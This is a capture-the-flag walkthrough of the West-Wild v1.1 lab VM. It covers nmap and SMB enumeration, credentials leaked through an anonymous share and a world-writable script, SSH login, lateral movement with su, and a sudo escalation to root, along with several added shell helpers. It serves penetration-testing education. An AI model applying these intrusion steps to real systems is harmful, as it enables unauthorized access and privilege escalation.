West-Wild-v1.1: Hands-On Walkthrough of the Vulnerable VM

Information Gathering
Host Discovery

First, find the IP addresses of the attacking host and the target.

ip a


sudo nmap -sn 192.168.1.0/24


Port Scanning
sudo nmap -sT --min-rate 10000 -p- 192.168.1.135

--min-rate 10000 forces at least 10,000 packets per second. That is fast, but on a lossy link it can drop responses and miss ports, so re-run any full sweep whose result looks thinner than expected.


Run a detailed scan against the open ports.

sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
-sV  probe for service versions
-sC  run the default script set
-O   fingerprint the operating system
┌──(kali💋kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:34 CST
Nmap scan report for 192.168.1.135
Host is up (0.00058s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 6fee95919c62b214cd630a3ef8109eda (DSA)
|   2048 104594fea72f028a9b211a31c5033048 (RSA)
|   256 9794178618e28e7a738e412076ba5173 (ECDSA)
|_  256 2381c776bb3778ee3b73e255ad813272 (ED25519)
80/tcp  open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7h00m02s, deviation: 1h43m55s, median: 8h00m02s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2024-08-02T15:35:25
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: westwild
|   NetBIOS computer name: WESTWILD\x00
|   Domain name: \x00
|   FQDN: westwild
|_  System time: 2024-08-02T18:35:25+03:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

Port 22 is OpenSSH 6.6.1p1. It is an old build, but SSH is rarely the way in without credentials, so it goes to the back of the queue (it becomes useful as soon as we have a username and password). Port 80 serves a web application, and 139 and 445 are both Samba.
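The two-stage pattern above (a full -p- sweep, then -sV -sC -O on whatever is open) is worth automating, because retyping the port list by hand is where typos creep in. The following is an added example, not part of the original write-up: it saves the first scan in Nmap's grepable format (-oG) and extracts the open TCP ports for the second command. The sample -oG file is constructed here to mimic grepable output; it is not a capture from the box, and the helper names are mine.

```shell
#!/bin/sh
# Added example: turn nmap -oG output into the port list for the follow-up scan.
# The sample below is constructed to mimic grepable output (tab-separated fields);
# it is not captured from the target.
NMAP_GNMAP_SAMPLE=$(mktemp)
printf '# Nmap 7.93 scan initiated as: nmap -sT --min-rate 10000 -p- -oG scan.gnmap 192.168.1.135\n' > "$NMAP_GNMAP_SAMPLE"
printf 'Host: 192.168.1.135 ()\tStatus: Up\n' >> "$NMAP_GNMAP_SAMPLE"
printf 'Host: 192.168.1.135 ()\tPorts: %s\tIgnored State: filtered (65530)\n' \
  '22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8080/closed/tcp//http-proxy///' \
  >> "$NMAP_GNMAP_SAMPLE"

# Print the open TCP ports from a grepable scan as "22,80,139,445".
# Assumes one host per file; closed/filtered entries and UDP ports are dropped.
open_ports() {
  grep '^Host:.*Ports:' "$1" \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State:.*//' \
    | tr ',' '\n' \
    | awk -F/ '$2 == "open" && $3 == "tcp" { sub(/^[ \t]+/, "", $1); print $1 }' \
    | paste -sd, -
}

# Build the targeted second-stage command used in the write-up from the port list.
# Returns 1 when nothing is open, so we never emit "-p" with an empty list.
followup_scan_cmd() {
  target=$1
  ports=$(open_ports "$2")
  [ -n "$ports" ] || return 1
  printf 'sudo nmap -sT -sV -sC -O -p%s %s\n' "$ports" "$target"
}

# Usage: on a real engagement run "sudo nmap -sT --min-rate 10000 -p- -oG scan.gnmap TARGET"
# first, then feed scan.gnmap to followup_scan_cmd and execute what it prints.
followup_scan_cmd 192.168.1.135 "$NMAP_GNMAP_SAMPLE"
```

The script only prints the second command rather than running it, so it can be checked before anything touches the network.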

Now a UDP scan.

sudo nmap -sU --top-ports 20 192.168.1.135
--top-ports 20  scan the 20 most commonly used UDP ports (by Nmap's frequency data), not ports 1-20
┌──(kali💋kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.1.135                                                          255 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:38 CST
Nmap scan report for 192.168.1.135
Host is up (0.00066s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:CC:AC:22 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 35.42 seconds

All four TCP ports can be tested over TCP; UDP only becomes relevant when something odd turns up or more information is needed. Here the only confirmed open UDP port is 137 (NetBIOS name service), which belongs to the same Samba stack.

Run Nmap's built-in vuln scripts against the open ports. Note that the vuln category includes intrusive checks (smb-vuln-regsvc-dos, for example, tries to crash the service it tests), so on anything other than a lab target confirm the scope first.

sudo nmap --script=vuln -p22,80,139,445 192.168.1.135
┌──(kali💋kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:46 CST
Nmap scan report for 192.168.1.135
Host is up (0.00052s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:CC:AC:22 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

Nmap done: 1 IP address (1 host up) scanned in 334.71 seconds

Samba Enumeration

Set the web side aside for the moment. The vuln-script output is not actionable: Slowloris is a denial-of-service finding, and smb-vuln-regsvc-dos describes a Windows 2000 service, so against Samba 4.3.11 on Ubuntu it is a false positive. Two ports expose SMB, which is a broad attack surface, so start there.

sudo smbmap -H 192.168.1.135


smbmap lists three shares, but only wave is accessible. Connect to it; no password is needed, just press Enter at the prompt (or pass -N to skip the prompt entirely).

sudo smbclient //192.168.1.135/wave


The share holds two files. Download them with get and open them.

┌──(kali💋kali)-[~/Desktop]
└─$ cat FLAG1.txt         
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

┌──(kali💋kali)-[~/Desktop]
└─$ cat message_from_aveng.txt 
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset  it for me . 
Thank You 
Aveng 

One is a base64-encoded blob; the other is a note from Aveng saying he lost his password and would like Wave to reset it.

Decode the base64 (it is an encoding, not encryption). If decoding fails, the text may simply be plaintext.

┌──(kali💋kali)-[~/Desktop]
└─$ echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K |base64 -d

Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

That gives us a username and a password.
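"Decode it, and if that fails treat it as plaintext" is a judgement call that is easy to get wrong by hand: `base64 -d` happily turns any string made of alphabet characters (a plaintext password, say) into garbage bytes. The following is an added example, not from the original write-up, that makes the check explicit: it accepts the input as base64 only if it both decodes cleanly and decodes to printable text, then pulls the user/password lines out of the result. The first input is the FLAG1.txt content shown above; the plaintext inputs are constructed for the fall-through case, and the helper names are mine.

```shell
#!/bin/sh
# Added example: decide whether a blob is base64 before trusting the decode,
# then extract credentials from the decoded text. Helper names are hypothetical.

# FLAG1.txt content from the wave share (as shown in the write-up).
FLAG1_B64='RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K'

# Print the decoded text if $1 is valid base64 that decodes to printable text.
# Otherwise print $1 unchanged and return 1, i.e. treat it as plaintext.
try_b64() {
  # GNU base64 -d rejects characters outside the alphabet and bad padding.
  if ! dec=$(printf '%s' "$1" | base64 -d 2>/dev/null); then
    printf '%s\n' "$1"; return 1
  fi
  # A plaintext word such as "password" still decodes, but to non-printable bytes:
  # delete every printable/whitespace byte and see whether anything is left.
  if [ "$(printf '%s' "$dec" | LC_ALL=C tr -d '[:print:][:space:]' | wc -c | tr -d ' ')" -ne 0 ]; then
    printf '%s\n' "$1"; return 1
  fi
  printf '%s\n' "$dec"
}

# Pull "user:" and "password:" lines out of a decoded blob as "user password".
# substr() rather than -F: so a password containing ':' survives intact.
creds_from_blob() {
  printf '%s\n' "$1" | awk '
    /^user:/     { u = substr($0, 6) }
    /^password:/ { p = substr($0, 10) }
    END { if (u != "" && p != "") print u, p }'
}

# Usage: decode the share's blob and extract the SSH credentials it leaks.
decoded=$(try_b64 "$FLAG1_B64") && creds_from_blob "$decoded"
# Constructed plaintext inputs: both fall through unchanged with status 1.
try_b64 'Dear Wave' || echo "(not base64)"
try_b64 'password'  || echo "(not base64)"
```

The printable-bytes test is deliberately strict; a blob that decodes to a binary file (a key, an archive) would also be reported as "not base64" and should be written to disk and inspected with file(1) instead.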

That exhausts the two SMB ports. Ports 22 and 80 remain; SSH stays at the back of the queue, so look at the web service on 80 first.

Web Enumeration

Browse to the site.


Nothing notable on the page itself; right-click and view the source.

<!DOCTYPE html>
<html>
<head>
<style>
body  {
 
  background-image: url("bkgro.png");
  background-color: #ffb500;
      background-repeat: no-repeat;
  background-attachment: fixed;
  background-position: center; 
}
</style>
</head>
<body>
</body>
</html>

Nothing here either. Check whether the background image carries hidden data or metadata.

┌──(kali💋kali)-[~/Desktop]
└─$ exiftool bkgro.png                                                                                  127 ⨯
ExifTool Version Number         : 12.92
File Name                       : bkgro.png
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2019:07:30 11:03:42+08:00
File Access Date/Time           : 2024:08:02 16:19:52+08:00
File Inode Change Date/Time     : 2024:08:02 16:19:51+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1280
Image Height                    : 720
Bit Depth                       : 8
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Relative Colorimetric
Pixels Per Unit X               : 2835
Pixels Per Unit Y               : 2835
Pixel Units                     : meters
Palette                         : (Binary data 285 bytes, use -b option to extract)
Image Size                      : 1280x720
Megapixels                      : 0.922

Nothing useful in the metadata. Use the credentials we already have to log in over SSH.

Getting a Foothold with the Credentials Leaked over Samba

Recall the credentials we obtained:

user:wavex
password:door+open
┌──(kali💋kali)-[~]
└─$ sudo ssh wavex@192.168.1.135                                                                                                             130 ⨯
wavex@192.168.1.135's password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Aug  2 19:46:01 +03 2024

  System load:  0.0               Processes:           164
  Usage of /:   78.0% of 1.70GB   Users logged in:     0
  Memory usage: 10%               IP address for eth0: 192.168.1.135
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug  2 19:46:01 2024 from 192.168.1.128
wavex@WestWild:~$ 

Login succeeded. Start with the usual three checks: who am I, what kernel is this, and what can I run with sudo.

wavex@WestWild:~$ whoami
wavex

wavex@WestWild:~$ uname -a
Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 i686 i686 GNU/Linux

wavex@WestWild:~$ sudo -l
[sudo] password for wavex: 
Sorry, user wavex may not run sudo on WestWild.
wavex@WestWild:~$ 

Look at /home; it contains two directories.

wavex@WestWild:~$ cd /home
wavex@WestWild:/home$ ls
aveng  wavex
wavex@WestWild:/home$ cd wavex
wavex@WestWild:~$ ls-liah
ls-liah: command not found
wavex@WestWild:~$ ls -liah
total 36K
69673 drwxr-xr-x 4 wavex  wavex   4.0K Aug  2 19:46 .
 7684 drwxr-xr-x 4 root   root    4.0K Jul 30  2019 ..
69900 -rw------- 1 wavex  wavex      5 Aug  2 19:46 .bash_history
69674 -rw-r--r-- 1 wavex  wavex    220 Jul 30  2019 .bash_logout
66935 -rw-r--r-- 1 wavex  wavex   3.6K Jul 30  2019 .bashrc
69882 drwx------ 2 wavex  wavex   4.0K Aug  2  2019 .cache
  611 -rw-r--r-- 1 wavex  wavex    675 Jul 30  2019 .profile
69690 -rw------- 1 wavex  wavex    870 Aug  2  2019 .viminfo
69679 drwxrwxrwx 2 nobody nogroup 4.0K Jul 30  2019 wave
wavex@WestWild:~$ 

Check this user's vim editing history in .viminfo.

cat .viminfo
wavex@WestWild:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:!bash
:x

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  /etc/passwd
'1  2  0  ~/wave/flag1.txt
'2  2  0  ~/wave/flag1.txt

# Jumplist (newest first):
-'  1  0  /etc/passwd
-'  2  0  ~/wave/flag1.txt
-'  1  0  ~/wave/flag1.txt
-'  1  0  /etc/shadow
-'  2  0  ~/wave/flag1.txt
-'  1  0  ~/wave/flag1.txt
-'  2  0  ~/wave/flag1.txt
-'  1  0  ~/wave/flag1.txt

# History of marks within files (newest to oldest):

> /etc/passwd
        "       1       0

> ~/wave/flag1.txt
        "       2       0
        ^       2       0
        .       1       2
        +       1       2
wavex@WestWild:~$ 

The file marks reference /etc/passwd, and the jumplist also shows /etc/shadow, so someone has opened both in vim from this account. Check what access we actually have to /etc/passwd.

wavex@WestWild:~$ ls -liah /etc/passwd
69678 -rw-r--r-- 1 root root 1.3K Jul 30  2019 /etc/passwd

Only readable, so there is no write-to-passwd shortcut here.
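Reading a .viminfo by eye works for one user, but on a box with several home directories it pays to pull out the leads mechanically: every path referenced by file marks, the jumplist and the per-file mark history, plus every ":" command (":!bash" and friends show the user dropping to a shell from vim). The following is an added example, not from the original write-up. The sample .viminfo is constructed to mirror the Vim 7.4 layout shown above, and the helper names are mine.

```shell
#!/bin/sh
# Added example: triage a .viminfo for files the user edited and commands run from vim.
# The sample is constructed to mirror the Vim 7.4 layout seen above; it is not the box's file.
VIMINFO_SAMPLE=$(mktemp)
cat > "$VIMINFO_SAMPLE" <<'EOF'
# This viminfo file was generated by Vim 7.4.
# Command Line History (newest to oldest):
:!bash
:x

# File marks:
'0  1  0  /etc/passwd
'1  2  0  ~/wave/flag1.txt

# Jumplist (newest first):
-'  1  0  /etc/passwd
-'  1  0  /etc/shadow
-'  2  0  ~/wave/flag1.txt

# History of marks within files (newest to oldest):

> /etc/passwd
        "       1       0

> ~/wave/flag1.txt
        "       2       0
EOF

# Unique file paths referenced by file marks ('N ...), jumplist entries (-' ...)
# and per-file mark history (> path). Paths containing spaces would be cut at the
# first space by the field split; acceptable for a first pass.
viminfo_files() {
  awk -v q="'" 'substr($0, 1, 1) == q || substr($0, 1, 2) == "-" q { print $4 }
                /^> / { print $2 }' "$1" | LC_ALL=C sort -u
}

# Paths outside the user's own home: these are the ones worth an ls -l.
viminfo_system_files() {
  viminfo_files "$1" | grep -v '^~'
}

# Commands typed at vim's ":" prompt. Entries starting with "!" spawned a shell.
viminfo_cmds() {
  awk '/^# Command Line History/ { in_hist = 1; next }
       /^#/                      { in_hist = 0 }
       in_hist && /^:/           { print }' "$1"
}

# Usage on a live box: for f in /home/*/.viminfo; do viminfo_system_files "$f"; done
viminfo_system_files "$VIMINFO_SAMPLE"
viminfo_cmds "$VIMINFO_SAMPLE"
```

Feed the system-file list into `ls -l` to check permissions, exactly as the write-up does by hand for /etc/passwd; /etc/shadow would be the next candidate.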

Check for scheduled tasks.

wavex@WestWild:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Only the stock entries. (/etc/crontab alone does not show /etc/cron.d, per-user crontabs in /var/spool/cron/crontabs or anacron jobs, so on a real engagement check those too.) Next, look for writable files.

find / -writable -type f ! -path '/proc/*' 2>/dev/null
-writable           files the current user can write to
! -path '/proc/*'   exclude that path
2>/dev/null         discard error messages
wavex@WestWild:~$ find / -writable -type f ! -path '/proc/*' 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/2.session/tasks
/sys/fs/cgroup/systemd/user/1001.user/2.session/cgroup.procs
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/usr/share/av/westsidesecret/ififoregt.sh
/home/wavex/.cache/motd.legal-displayed
/home/wavex/wave/FLAG1.txt
/home/wavex/wave/message_from_aveng.txt
/home/wavex/.bash_history
/home/wavex/.profile
/home/wavex/.bashrc
/home/wavex/.viminfo
/home/wavex/.bash_logout
wavex@WestWild:~$ 
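Most of the hits above are noise: the /sys/kernel/security/apparmor entries are kernel interfaces, and the /home/wavex files are writable simply because they belong to us (-writable asks "can I write this", which includes our own files). The following is an added example, not from the original write-up, that narrows the search: it prunes the pseudo-filesystems and home directories, switches to the permission bit (-perm -002, "world-writable") and then greps the survivors for credential-looking lines. It runs against a constructed directory tree so it can be tried without a target; on a real box call it with / as the root. Helper names are mine.

```shell
#!/bin/sh
# Added example: world-writable files outside pseudo-filesystems and home directories.
# The directory tree below is constructed for the demo; it is not the box's filesystem.
FS_ROOT=$(mktemp -d)
mkdir -p "$FS_ROOT/proc/1" "$FS_ROOT/sys/kernel/security/apparmor" \
         "$FS_ROOT/usr/share/av/westsidesecret" "$FS_ROOT/etc" "$FS_ROOT/home/wavex"
printf 'Name:\tinit\n' > "$FS_ROOT/proc/1/status"
chmod 666 "$FS_ROOT/proc/1/status"                         # pseudo-fs noise, pruned
: > "$FS_ROOT/sys/kernel/security/apparmor/.load"
chmod 666 "$FS_ROOT/sys/kernel/security/apparmor/.load"    # pseudo-fs noise, pruned
: > "$FS_ROOT/home/wavex/.bashrc"
chmod 644 "$FS_ROOT/home/wavex/.bashrc"                    # own file, not world-writable
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$FS_ROOT/etc/passwd"
chmod 644 "$FS_ROOT/etc/passwd"                            # readable only
printf '#!/bin/bash\nfiglet "if i foregt so this my way"\necho "user:aveng"\necho "password:kaizen+80"\n' \
  > "$FS_ROOT/usr/share/av/westsidesecret/ififoregt.sh"
chmod 777 "$FS_ROOT/usr/share/av/westsidesecret/ififoregt.sh"   # the real finding

# World-writable regular files under $1, pruning proc, sys, dev and home.
# -perm -002 tests the other-write bit, so the result does not depend on who runs it.
world_writable_outside_home() {
  case $1 in
    /) prefix= ;;              # "/" would otherwise give "//proc", which -path never matches
    *) prefix=${1%/} ;;
  esac
  find "${prefix:-/}" \( -path "$prefix/proc" -o -path "$prefix/sys" \
                         -o -path "$prefix/dev" -o -path "$prefix/home" \) -prune \
       -o -type f -perm -002 -print 2>/dev/null | LC_ALL=C sort
}

# Of those, the files that contain credential-looking strings.
writable_with_secrets() {
  world_writable_outside_home "$1" | while IFS= read -r f; do
    grep -iqE 'user|pass(word)?' "$f" 2>/dev/null && printf '%s\n' "$f"
  done
}

# Usage on a live box: world_writable_outside_home /   (then cat whatever it lists)
world_writable_outside_home "$FS_ROOT"
writable_with_secrets "$FS_ROOT"
```

A world-writable script under /usr/share is interesting twice over: here it leaks a password, but if anything privileged (a cron job, a login hook) executed it, writing to it would be a direct route to that privilege, which is why the permission check comes before the content check.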

The /sys/kernel/security/apparmor entries are kernel interfaces, not real files, and the /home/wavex hits are our own. The interesting one is /usr/share/av/westsidesecret/ififoregt.sh; open it.

cat /usr/share/av/westsidesecret/ififoregt.sh
wavex@WestWild:~$ cat /usr/share/av/westsidesecret/ififoregt.sh
 #!/bin/bash 
 figlet "if i foregt so this my way"
 echo "user:aveng"
 echo "password:kaizen+80"

Another username and password. Switch user directly: lateral movement from wavex to aveng.

su aveng
aveng@WestWild:/home/wavex$ whoami
aveng
aveng@WestWild:/home/wavex$ cd ../aveng
aveng@WestWild:~$ ls -liah
total 28K
69176 dr-xr-xr-x 3 aveng aveng 4.0K Aug  2  2019 .
 7684 drwxr-xr-x 4 root  root  4.0K Jul 30  2019 ..
13771 -rw-r--r-- 1 aveng aveng  220 Jul 30  2019 .bash_logout
13504 -rw-r--r-- 1 aveng aveng 3.6K Jul 30  2019 .bashrc
69632 drwx------ 2 aveng aveng 4.0K Jul 30  2019 .cache
  716 -rw-r--r-- 1 aveng aveng  675 Jul 30  2019 .profile
69667 -rw------- 1 aveng aveng  511 Jul 30  2019 .viminfo

Privilege Escalation to root via sudo

Check the sudo rights with sudo -l.

aveng@WestWild:~$ sudo -l
[sudo] password for aveng: 
Matching Defaults entries for aveng on WestWild:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aveng may run the following commands on WestWild:
    (ALL : ALL) ALL

(ALL : ALL) ALL means aveng may run any command as any user, root included, so this is trivial.

sudo /bin/bash
aveng@WestWild:~$ sudo /bin/bash
root@WestWild:~# whoami
root
root@WestWild:~# 

There is also a FLAG2 file in /root.

root@WestWild:~# cd /root 
root@WestWild:/root# ls
FLAG2.txt
root@WestWild:/root# cat FLAG2.txt
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}

Great! take a screenshot and Share it with me in twitter @HashimAlshareff 